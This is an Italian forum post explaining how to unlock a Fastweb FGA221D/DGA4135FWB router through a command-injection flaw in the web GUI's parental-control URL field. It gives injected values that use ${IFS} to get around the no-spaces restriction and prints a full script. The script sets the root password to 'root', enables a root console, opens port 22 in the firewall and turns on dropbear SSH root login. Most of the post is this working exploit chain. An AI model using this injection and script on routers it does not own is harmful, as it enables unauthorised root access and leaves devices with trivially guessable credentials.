Ciao, una guida non credo sia ancora stata scritta, io ho il FGA221D che condivide il firmware del DGA4135FWB e almeno fino alla versione 22.2.0378_FW_055_FGA221D la GUI fastweb è vulnerabile in uno dei campi compilabili (Mi pare fosse la stessa trovata ai tempi sul ZXHN H388Q)
Potrei aver trovato qualcosa di interessante, ma non so come sfruttare la falla, sul parental control inserendo come url ;reboot
il fastgate si riavvia, quindi penso che quel campo sia iniettabile... Ma essendo il formato originale di un link non accetta stringhe con spazi, sono riuscito solo a riavviarlo... Ho pensato di fargli eseguire uno script da chiavetta, ma non riesco a farlo senza usare spazi
e quindi con il comando
;sh${IFS}/tmp/run/mountd/sda1/sblocco.sh
e possibile eseguire un file "sblocco.sh" da una chiavetta USB.
Ho creato un file sblocco con questo contenuto:
#!/bin/sh
echo root:root | chpasswd
sed -i 's#/root:.*$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*$#askconsole:/bin/ash#' /etc/inittab
uci -q set $(uci show firewall | grep -m 1 $(fw3 -q print | egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment "!fw3: .+" -j DROP' | sed -n -e 's/^iptables.\+fw3: \(.\+\)".\+//p') | sed -n -e "s/\(.\+\).name='.\+'$//p").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci set dropbear.global.enable='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
che permette di abilitare l'accesso con username root e password root tramite SSH nella porta 22.
Attenzione, la base del firmware technicolor di questi dispositivi è 22.2 e la GUI Ansuel non è testata per funzionare su questo firmware.
Inoltre queste nuove versioni firmware sono diverse da quelle che conosciamo in RBI, sia per la struttura (I firmware sono adesso in pkgtb) sia come bootloader (Vedi
https://hack-technicolor.readthedocs.io/en/latest/Resources/#devices-with-u-boot-bootloader). Io non ho approfondito e non ho abbastanza conoscenze su queste tipologie di firmware